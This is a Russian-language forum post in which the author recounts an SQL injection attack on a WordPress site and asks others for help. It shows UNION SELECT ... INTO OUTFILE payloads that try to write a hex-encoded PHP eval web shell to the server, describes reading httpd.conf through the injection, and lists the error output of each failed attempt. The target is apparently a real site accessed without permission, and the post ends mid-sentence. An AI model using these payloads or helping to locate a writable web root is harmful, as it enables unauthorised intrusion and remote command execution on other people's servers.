Условия:
1. File_priv:
Y
2. Возможно читать файлы
3. Возможное раскрытие путей через Wordpress
4. Заливка файла через INTO OUTFILE -
возможна.
Всё-бы нечего, НО:
Начнём историю по порядку - во-первых на самом сайте через wp-config запрещён доступ к theme-editor и plugin-editor всем пользователям.
Но я не отчаивался, т.к. File_priv: Y.
Всё вроде бы ничего и даже получил раскрытие путей, однако:
Сообщение от
None
/home/httpd/html/site/shared/wp/live/
Уже это насторожило, т.к. сам блог находится по адресу
site.com/blog/, но я не сдавался и шел по избранному мною пути:
1.
Сообщение от
None
+union+select+1,2,3,0x273c203f706870206576616c2824 5f524551554553545b636d645d293b203f3e27,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20+from+mysql.user+in to+outfile+'/home/httpd/html/site/shared/wp/live/wp-content/vvvvv.php'--
Can't create/write to file '/home/httpd/html/site/shared/wp/live/wp-content/vvvvv.php' (Errcode: 2)
Супервозмущение
Но я не отчаивался и шёл!
Дошёл до
2.
Сообщение от
None
+union+select+1,2,3,0x273c203f706870206576616c2824 5f524551554553545b636d645d293b203f3e27,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20+from+mysql.user+in to+outfile+'/home/httpd/html/'--
File '/home/httpd/html/' already exists
И вот, я кажется дошёл. Но тут подвох - я перепробовал все возможные комбинации и даже очень опасную, однако даже она дала сбой
Can't create/write to file '/home/httpd/html/huipizdamatreshka/' (Errcode: 21)
Если подставлять вместо опасного запроса, запрос вида:
into+outfile+'/home/httpd/html/site/1.txt'-- , либо любой другой, то получаю ошибку Errcode: 2 , т.е. нет директории site.
Читал на форумах, что в случае, если адрес не известен, то читаем файл httpd.conf (прочитал его по
/etc/httpd/conf/httpd.conf ).
Нашёл в нём:
DocumentRoot "/var/www/html" и всё равно провалился. Чтобы не делал - результат один Errcode 2, 13, 21
Есть ли у кого-нибудь, какие-нибудь предположение или догадки, как найти полный путь до папки? Кстати, нет-нет, но закачал файл в /tmp/ . Результат